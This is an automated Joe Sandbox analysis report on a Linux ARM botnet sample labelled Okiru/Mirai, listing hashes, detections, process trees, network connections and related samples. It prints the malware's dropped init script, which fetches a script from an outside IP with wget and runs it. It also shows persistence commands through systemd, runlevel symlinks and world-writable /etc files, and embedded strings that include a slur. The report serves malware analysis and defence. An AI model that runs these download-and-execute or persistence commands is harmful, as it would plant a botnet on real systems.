Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm.nn.elf

Overview

General Information

Sample name:arm.nn.elf
Analysis ID:1580234
MD5:e2f7e7155399c4035b2c1c805c721610
SHA1:d2e386a8c5f65ca9f1aec178298c545a25d58c7d
SHA256:b223160a9b5e58400e86e34c50d2d36d1d874eabdc272641a8d66eed75245493
Tags:elfuser-abuse_ch
Infos:

Detection

Okiru
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Okiru
Drops files in suspicious directories
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1580234
Start date and time:2024-12-24 05:32:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.nn.elf
Detection:MAL
Classification:mal72.spre.troj.evad.linELF@0/10@0/0
  • VT rate limit hit for: /etc/rc.local
Command:/tmp/arm.nn.elf
PID:6254
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • dash New Fork (PID: 6225, Parent: 4331)
  • rm (PID: 6225, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q
  • dash New Fork (PID: 6226, Parent: 4331)
  • rm (PID: 6226, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8q
  • arm.nn.elf (PID: 6254, Parent: 6156, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.nn.elf
    • sh (PID: 6271, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6279, Parent: 6271)
      • systemctl (PID: 6279, Parent: 6271, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6305, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6311, Parent: 6305)
      • chmod (PID: 6311, Parent: 6305, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6312, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6314, Parent: 6312)
      • ln (PID: 6314, Parent: 6312, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6315, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
    • sh (PID: 6317, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6319, Parent: 6317)
      • chmod (PID: 6319, Parent: 6317, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/arm.nn.elf
    • sh (PID: 6320, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6322, Parent: 6320)
      • mkdir (PID: 6322, Parent: 6320, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6323, Parent: 6254, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
      • sh New Fork (PID: 6325, Parent: 6323)
      • ln (PID: 6325, Parent: 6323, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
  • udisksd New Fork (PID: 6267, Parent: 799)
  • dumpe2fs (PID: 6267, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6292, Parent: 6291)
  • snapd-env-generator (PID: 6292, Parent: 6291, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6340, Parent: 799)
  • dumpe2fs (PID: 6340, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6360, Parent: 799)
  • dumpe2fs (PID: 6360, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
SourceRuleDescriptionAuthorStrings
arm.nn.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    SourceRuleDescriptionAuthorStrings
    6254.1.00007f8774017000.00007f877402d000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
      Process Memory Space: arm.nn.elf PID: 6254JoeSecurity_OkiruYara detected OkiruJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: arm.nn.elfAvira: detected
        Source: arm.nn.elfString: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%stmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s
        Source: global trafficTCP traffic: 192.168.2.23:60008 -> 94.156.227.234:38242
        Source: /tmp/arm.nn.elf (PID: 6254)Socket: 0.0.0.0:38242Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.227.234
        Source: arm.nn.elf, system.16.dr, inittab.16.dr, arm.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drString found in binary or memory: http://94.156.227.233/
        Source: arm.nn.elfString found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%stmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/tmp/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/g
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal72.spre.troj.evad.linELF@0/10@0/0

        Persistence and Installation Behavior

        barindex
        Source: /tmp/arm.nn.elf (PID: 6254)File: /etc/profileJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6254)File: /etc/rc.localJump to behavior
        Source: /usr/bin/ln (PID: 6314)File: /etc/rcS.d/S99system -> /etc/init.d/systemJump to behavior
        Source: /usr/bin/ln (PID: 6325)File: /etc/rc.d/S99arm.nn.elf -> /etc/init.d/arm.nn.elfJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6254)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6311)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6319)File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6399/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/799/cmdlineJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6403/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6425/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6402/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6424/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6427/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6426/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6429/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6428/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6067/cmdlineJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6421/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6420/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6401/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6423/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6400/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6422/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6360/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6414/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6413/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6416/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6415/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6418/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6417/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6328)File opened: /proc/6419/statusJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6271)Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6305)Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6312)Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6315)Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6317)Shell command executed: sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6320)Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6323)Shell command executed: sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"Jump to behavior
        Source: /bin/sh (PID: 6311)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/systemJump to behavior
        Source: /bin/sh (PID: 6319)Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/arm.nn.elfJump to behavior
        Source: /bin/sh (PID: 6322)Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.dJump to behavior
        Source: /usr/bin/dash (PID: 6225)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8qJump to behavior
        Source: /usr/bin/dash (PID: 6226)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.euLig1AMQx /tmp/tmp.MKEFwQBc8l /tmp/tmp.p9eEBykA8qJump to behavior
        Source: /bin/sh (PID: 6279)Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.serviceJump to behavior
        Source: /tmp/arm.nn.elf (PID: 6254)File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6311)File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /usr/bin/chmod (PID: 6319)File: /etc/init.d/arm.nn.elf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/arm.nn.elf (PID: 6254)Writes shell script file to disk with an unusual file extension: /etc/init.d/systemJump to dropped file
        Source: /tmp/arm.nn.elf (PID: 6254)Writes shell script file to disk with an unusual file extension: /etc/rc.localJump to dropped file
        Source: /bin/sh (PID: 6315)Writes shell script file to disk with an unusual file extension: /etc/init.d/arm.nn.elfJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/arm.nn.elf (PID: 6254)File: /etc/init.d/systemJump to dropped file
        Source: /bin/sh (PID: 6315)File: /etc/init.d/arm.nn.elfJump to dropped file
        Source: /tmp/arm.nn.elf (PID: 6254)Queries kernel information via 'uname': Jump to behavior
        Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmpBinary or memory string: KV!/etc/qemu-binfmt/arm
        Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
        Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmpBinary or memory string: KV/tmp/qemu-open.vEDlp5
        Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
        Source: arm.nn.elf, 6254.1.0000564bb3e37000.0000564bb3f85000.rw-.sdmpBinary or memory string: !/proc/2018/exe0!/usr/bin/vmtoolsd1/proc/1/cgroup/arm/sr10!/proc/2014/exe0!/proc/759/exe!/proc/2077/exe/arm/pro
        Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmpBinary or memory string: /tmp/qemu-open.vEDlp5
        Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
        Source: arm.nn.elf, 6254.1.00007ffd002b1000.00007ffd002d2000.rw-.sdmpBinary or memory string: vlx86_64/usr/bin/qemu-arm/tmp/arm.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.nn.elf

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6254.1.00007f8774017000.00007f877402d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6254, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: arm.nn.elf, type: SAMPLE
        Source: Yara matchFile source: 6254.1.00007f8774017000.00007f877402d000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: arm.nn.elf PID: 6254, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Unix Shell Configuration Modification
        1
        Unix Shell Configuration Modification
        1
        Masquerading
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Systemd Service
        1
        Systemd Service
        2
        File and Directory Permissions Modification
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt2
        Scripting
        Logon Script (Windows)1
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580234 Sample: arm.nn.elf Startdate: 24/12/2024 Architecture: LINUX Score: 72 51 94.156.227.234, 38242, 60008, 60010 NETIXBG Bulgaria 2->51 53 109.202.202.202, 80 INIT7CH Switzerland 2->53 55 2 other IPs or domains 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Yara detected Okiru 2->59 8 dash rm arm.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 3 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 61 Sample tries to set files in /etc globally writable 8->61 63 Sample tries to persist itself using /etc/profile 8->63 65 Drops files in suspicious directories 8->65 67 Sample tries to persist itself using System V runlevels 8->67 18 arm.nn.elf sh 8->18         started        20 arm.nn.elf sh 8->20         started        22 arm.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/arm.nn.elf, POSIX 24->49 dropped 69 Drops files in suspicious directories 24->69 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 arm.nn.elf 24->41         started        signatures9 process10 signatures11 71 Sample tries to set files in /etc globally writable 28->71 73 Sample tries to persist itself using System V runlevels 31->73

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        arm.nn.elf100%AviraEXP/ELF.Mirai.W
        SourceDetectionScannerLabelLink
        /etc/rc.local0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        NameSourceMaliciousAntivirus DetectionReputation
        http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sarm.nn.elffalse
          high
          http://94.156.227.233/arm.nn.elf, system.16.dr, inittab.16.dr, arm.nn.elf.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            109.202.202.202
            unknownSwitzerland
            13030INIT7CHfalse
            94.156.227.234
            unknownBulgaria
            57463NETIXBGfalse
            91.189.91.43
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            91.189.91.42
            unknownUnited Kingdom
            41231CANONICAL-ASGBfalse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
            94.156.227.234x86_32.nn.elfGet hashmaliciousOkiruBrowse
              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                  powerpc.nn.elfGet hashmaliciousOkiruBrowse
                    x86_32.nn.elfGet hashmaliciousOkiruBrowse
                      arm7.nn-20241224-0051.elfGet hashmaliciousMirai, OkiruBrowse
                        sparc.nn.elfGet hashmaliciousOkiruBrowse
                          arm5.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                            arm.nn-20241224-0050.elfGet hashmaliciousOkiruBrowse
                              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                91.189.91.43mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                  nklarm6.elfGet hashmaliciousUnknownBrowse
                                    nabarm6.elfGet hashmaliciousUnknownBrowse
                                      zerarm6.elfGet hashmaliciousUnknownBrowse
                                        armv4eb.elfGet hashmaliciousUnknownBrowse
                                          x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                            tftp.elfGet hashmaliciousUnknownBrowse
                                              bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                  powerpc.nn.elfGet hashmaliciousOkiruBrowse
                                                    No context
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CANONICAL-ASGBx86_32.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 185.125.190.26
                                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                    • 91.189.91.42
                                                    nklarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    splarm6.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
